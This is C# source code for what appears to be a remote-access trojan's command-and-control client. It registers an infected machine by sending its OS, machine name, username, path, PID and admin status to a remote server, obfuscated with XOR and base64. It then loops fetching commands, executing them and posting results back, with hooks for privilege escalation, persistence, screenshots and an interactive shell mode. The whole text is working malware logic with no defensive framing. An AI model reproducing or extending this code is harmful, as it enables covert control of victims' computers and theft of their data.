/*
* <explanation>
* Send result of command to speficied uri as rspns.
* </explanation>
*/
public void _sendResult(String result, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
string asd = chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
string myParameters = "sid=" + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar")) + "&rspns=" + chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string sendResult = web.UploadString(Globals.resultSendUri, myParameters);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
_sendResult(result, web, enumEnv, chipops);
break;
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
}
}
/*
* <explanation>
* Send GET request to speficied uri and return response as command.
* </explanation>
*/
public string _getCommand(String uri, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
try
{
comm = web.DownloadString(uri);
string clearedComm = Regex.Replace(comm, @"^\s+$[\r\n]*", string.Empty, RegexOptions.Multiline);
string decodedComm = chipops._xorOps(chipops._base64decode(clearedComm), enumEnv.xorKey);
return(decodedComm);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
comm = web.DownloadString(uri);
string clearCommand = chipops._xorOps(chipops._base64decode(comm), enumEnv.xorKey);
return(clearCommand);
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
return("");
}
}
/*
* <explanation>
* Second stage of registration process.
* In this stage; operating system, machine name, username, working directory, process id and current privileges are send to server
* via POST request in base64 format. And if server returns "OK" as response, registration process will be marked as completed.
* Otherwise, function waits for 5 seconds and tries to send POST request again.
* <variable>isCompleted</variable> will be used for checking if registration process is completed.
* </explanation>
*/
private void _registerSecondStage(ref initialEnum enumed)
{
if (errorCounter < 20)
{
OperatingSystem os_info = System.Environment.OSVersion;
string opsys = chiperObj._base64encode(chiperObj._xorOps(enumed.osVer, enumed.xorKey));
string mName = chiperObj._base64encode(chiperObj._xorOps(enumed.mName, enumed.xorKey));
string sus = chiperObj._base64encode(chiperObj._xorOps(enumed.userName, enumed.xorKey));
string wdir = chiperObj._base64encode(chiperObj._xorOps(enumed.executablePath, enumed.xorKey));
string isadmin = chiperObj._base64encode(chiperObj._xorOps(enumed.isAdmin.ToString(), enumed.xorKey));
string pid = chiperObj._base64encode(chiperObj._xorOps(enumed.processId.ToString(), enumed.xorKey));
string id = chiperObj._base64encode(chiperObj._xorOps(enumed.clientID, "northstar"));
string myParameters = "sid=" + id + "&opsys=" + opsys + "&mName=" + mName + "&sus=" + sus + "&wdir=" + wdir + "&pid=" + pid + "&isadm=" + isadmin;
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string res = web.UploadString(Globals.registerSecondStageUri, myParameters);
if (!res.Contains("NOT FOUND"))
{
isComplete = true;
errorCounter = 0;
}
else
{
errorCounter += 1;
System.Threading.Thread.Sleep(5000);
_registerSecondStage(ref enumed);
}
}
catch
{
errorCounter += 1;
System.Threading.Thread.Sleep(5000);
_registerSecondStage(ref enumed);
}
}
else
{
isComplete = false;
}
}
static void Main(string[] args)
{
WebClient web = new WebClient();
web.Proxy = WebRequest.GetSystemWebProxy();
web.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
web.Credentials = CredentialCache.DefaultCredentials;
initialEnum enumEnv = new initialEnum();
privilegeEscalation privs = new privilegeEscalation();
sendRetrieve sendOrRetrieve = new sendRetrieve();
Chiper chipops = new Chiper();
addPersistence persistence = new addPersistence();
processCommand proc = new processCommand(enumEnv, privs, persistence);
registerIn register;
int waitTimeCounter = 0;
register = new registerIn(enumEnv, chipops, web);
if (register.isComplete)
{
// persistence._copyItSelf();
string commandRetrieveUri = Globals.commandRetrieveUri + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar"));
while (true)
{
string comm = sendOrRetrieve._getCommand(commandRetrieveUri, web, enumEnv, chipops);
if (!proc.cmdModeEnabled)
{
try
{
if (comm.Length >= 2)
{
if (comm == "die")
{
break;
}
waitTimeCounter = 0;
string commandResult = proc._parseCommand(comm);
if (!proc.wasScreenshot && commandResult.Length > 1)
{
sendOrRetrieve._sendResult(commandResult, web, enumEnv, chipops);
}
else
{
proc.wasScreenshot = false;
}
}
else if (comm.Length < 2)
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
catch
{
System.Threading.Thread.Sleep(enumEnv.waitTime);
}
}
else //if cmd mode enabled
{
if (comm.Length > 2)
{
if (comm == "exit" || comm == "break" || comm == "disablecmd")
{
proc.cmdModeEnabled = false;
sendOrRetrieve._sendResult("CMD mode disabled", web, enumEnv, chipops);
}
else
{
if (comm.Contains("wait"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else if (comm.Contains("cd ") && !comm.Contains("cd ,"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else
{
proc._cmdMode(comm, sendOrRetrieve, enumEnv, web, chipops, commandRetrieveUri);
}
}
}
else
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
if (!enumEnv.isWaitTimeManuallySetted)
{
enumEnv.setRandomWaitTime();
}
}
}
}
